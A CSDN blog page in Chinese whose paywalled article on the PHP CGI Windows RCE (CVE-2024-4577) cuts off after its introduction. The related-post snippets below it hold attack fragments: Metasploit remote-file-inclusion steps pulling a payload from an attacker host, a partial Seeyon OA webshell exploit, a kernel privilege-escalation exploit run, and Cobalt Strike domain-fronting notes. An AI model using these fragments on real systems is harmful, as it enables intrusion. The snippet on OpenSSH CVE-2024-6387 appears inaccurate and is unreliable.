PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)分析与复现

已于 2024-07-28 04:28:00 修改
阅读量147 收藏
点赞数 5
分类专栏: web漏洞 文章标签: php 开发语言
于 2024-06-24 14:15:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuguojiuai/article/details/139924758
版权

在2024.6.6今天,@Orange在他的博客发布了他即将在2024年8月Black Hat USA公开的议题《Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!

伴随着议题的发布,今天在DEVCORE的官方博客发布了一个漏洞通报,也就是存在于windows特殊场景下的PHP CGI远程代码执行漏洞

接下来看看漏洞的详情

漏洞描述

CVE-2024-4577导致漏洞产生的本质其实是

了解本专栏 订阅专栏 解锁全文 超级会员免费看
小韩韩啊
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
点击劫持漏洞原理及利用包含修复建议
课嗨教育的专栏
01-12 3789
今天群里有人问如何查看是否存在点击劫持漏洞,我们首先了解下漏洞是如何产生的,点击劫持漏洞是因为网站未对referer来源进行验证导致的。 具体测试及利用的话我们可以用iframe制作一个透明标签在上面: 案例: <!DOCTYPE HTML> <html> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <head> <title>点击劫持<
xray poc-yaml-joomla-cve-2018-7314-sql
课嗨教育的专栏
01-20 3455
漏洞描述 Joomla!是美国OpenSourceMatters团队开发的一套开源的内容管理系统(CMS),该系统提供RSS馈送、网站搜索等功能。PrayerCenter是使用在其中的一个祷告分享组件。Joomla!PrayerCenter3.0.2版本中存在SQL注入漏洞远程攻击者可借助‘sessionid’参数利用该漏洞查看、添加、更改或删除后端数据库中的信息。 SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla!
漏洞复现PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
网络安全从业者的学习笔记
06-10 1376
导致漏洞产生的本质其实是Windows系统内字符编码转换的Best-Fit特性导致的。由于Windows系统内字符编码转换的Best-Fit特性导致PHP原本的安全限制被绕过,再加上一些特殊的PHP CGI环境配置导致了这个问题。目前,官方已发布修复建议,建议受影响的用户尽快升级至安全版本。无需任何配置信息修改。
PHP-CGI Windows平台远程代码执行漏洞复现(CVE-2024-4577)
weixin_45653478的博客
06-27 821
CVE-2024-4577是一个在Windows平台上运行的PHP CGI(Common Gateway Interface)的远程代码执行漏洞。该漏洞的存在主要是因为PHP在设计时未能预见到Windows系统的Best-Fit字符编码转换特性,导致攻击者可以通过构造特定的请求来绕过安全限制,从而在远程PHP服务器上执行任意代码
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
PHP-CGI远程代码执行漏洞分析与防范
10-19
本文给大家介绍的是PHP-CGI远程代码执行漏洞CVE-2012-1823)分析和防范,这是最近爆出的一个php的比较严重的漏洞,这里分享给大家。
YKfaka优卡自动发卡程序漏洞合集(这是篇水文)
课嗨教育的专栏
08-09 2852
alert(/xss/)
fofa爬虫(刷漏洞平台好方法)
课嗨教育的专栏
05-01 2253
目录 说明: 代码 配置 说明: 支持多关键词爬虫,适合于rad+xray联动。 关键词一行一个,fofa.txt文本内容为关键词,target内容为结果,直接与Xray_Rad_Fusion放在同一个目录下执行即可联动。 代码 import requests,os,sys,base64,json,re from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.url
weblogic LDAP远程代码执行 CVE-2021-2109
课嗨教育的专栏
02-01 2250
漏洞影响版本 WebLogic Server 10.3.6.0.0 WebLogic Server 12.1.3.0.0 WebLogic Server 12.2.1.3.0 WebLogic Server 12.2.1.4.0 WebLogic Server 14.1.1.0.0 漏洞复现 搭建实验环境,我这里直接使用vulhub里weblogic CVE-2020-14882的环境 访问http://192.168.2.131:7001,出现以下界面说明搭建成功 访问以下路径,如果
PHP文件包含漏洞 Metasploit
课嗨教育的专栏
11-13 2211
原理: METASPLOIT生成PHP 或者PYTHON的DOOR EG: http://5.5.5.3:1111/1.txt 然后/lfi.php?file=http://5.5.5.3:1111/1.txt 启动METASPLOIT msf > use exploit/unix/webapp/php_include msf exploit(php_include) > set RHOST 5.5.5.2 RHOST => 5.5.5.2 msf exploit(php_in
致远OA任意文件上传
课嗨教育的专栏
05-10 2080
1)通过请求直接获取管理员权限cookie 2)通过上传一个压缩文件,调用接口进行文件在解压时会利用解压过程的漏洞利用获取webshell def seeyon_new_rce(targeturl): orgurl=targeturl #通过请求直接获取管理员权限cookie targeturl=orgurl+'seeyon/thirdpartyController.do' post='method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmc
XSS跨站脚本攻击
课嗨教育的专栏
07-16 1601
存储型XSS也被称之为持久型XSS,相比于反射型XSS危害更大,存储型XSS不需要用户访问特定的url地址,就能执行XSS恶意代码,主要是由于攻击者提前将恶意的xss代码注入到了应用中或存储到了相关数据库中,在用户访问页面的时候即可被调用或从数据库读取出来。在请求链接中页面传递了kehai参数,在课嗨参数中,未对用户输入进行过滤,导致在kehai参数中带有了标签并且该标签内的alert函数被触发,弹出内容为xss的提示框。...
CRLF Injection (CRLF注入)
课嗨教育的专栏
06-20 1359
漏洞简介 CRLF是”回车 + 换行”(\r\n)的简称。在HTTP协议中,HTTP Header与HTTP Body是用两个CRLF分隔的,浏览器就是根据这两个CRLF来取出HTTP 内容并显示出来。所以,一旦能够控制HTTP 消息头中的字符,注入一些恶意的换行,这样就能注入一些会话Cookie或者HTML代码,所以CRLF Injection又叫HTTP Response Splitting,简称HRS。HRS是比XSS危害更大的安全问题。 形成原理 在HTTP协议中,HTTP头是通过”\r\..
黑盒判断FastJson组件
课嗨教育的专栏
01-26 1339
判断方法个人总结有以下四种: 1. 响应报错 如果站点响应结果中会将代码控制台的错误结果回显,就可以用不闭合括号、引号等方式进行报错回显,报错结果中可以通过 类的包名判断是哪个json组件 com.alibaba.fastjson.JSONException com.fasterxml.jackson.databind.xxxxxxxxx 2. 支持额外属性的特性 fastjson支持类对象以外的属性获取,而jackson不支持,可以在测试时可以通过添加额外的参数值,查看是不否报
免费域名cs的域前置上线
课嗨教育的专栏
05-13 991
目录 注册域名 注册邮箱 注册域名 国内各个公司大佬都习惯用自己的.com或者.cn、.net域名上线,早年各位白嫖的时候都知道有tk域名是免费域名,还有那种免费空间建站。这里用到的就是免费域名tk域名。其他免费域名需要各位自己查找~ http://www.jm.cn/?t=xx_8486 或者可以百度搜索: https://www.baidu.com/baidu?tn=monline_4_dg&ie=utf-8&wd=.tk%E5%9F%9F%E5%90%8D%E5%85%8
OpenSSH 远程代码执行漏洞(CVE-2024-6387)
最新发布
07-04
<< OpenSSH 是一个广泛使用的开源网络协议,用于提供安全的远程登录(SSH)服务。CVE-2024-6387是一个公开的安全漏洞,也被称为“OpenSSH 命令注入漏洞”或“SSH Remote Code Execution (RCE)”,它发生在某些版本的 OpenSSH 中。 这个漏洞允许攻击者通过精心构造的 SSH 命令执行任意系统命令,从而获得对远程服务器的控制,如果用户权限足够,这可能导致严重的数据泄露或系统破坏。具体来说,攻击者能够利用该漏洞通过发送恶意 SSH 延迟请求,使得 SSH 服务器处理命令的过程中出现错误,从而绕过输入验证机制,得以执行未经授权的操作。 修复漏洞的方法通常是升级到最新版的 OpenSSH 客户端和服务器软件,因为开发团队通常会为这类高危漏洞发布补丁。为了保护系统安全,管理员应尽快应用这些更新,并限制不必要的 SSH 访问权限,只允许经过身份验证并有明确授权的用户连接。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小韩韩啊

你的鼓励是对我最大的支持

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值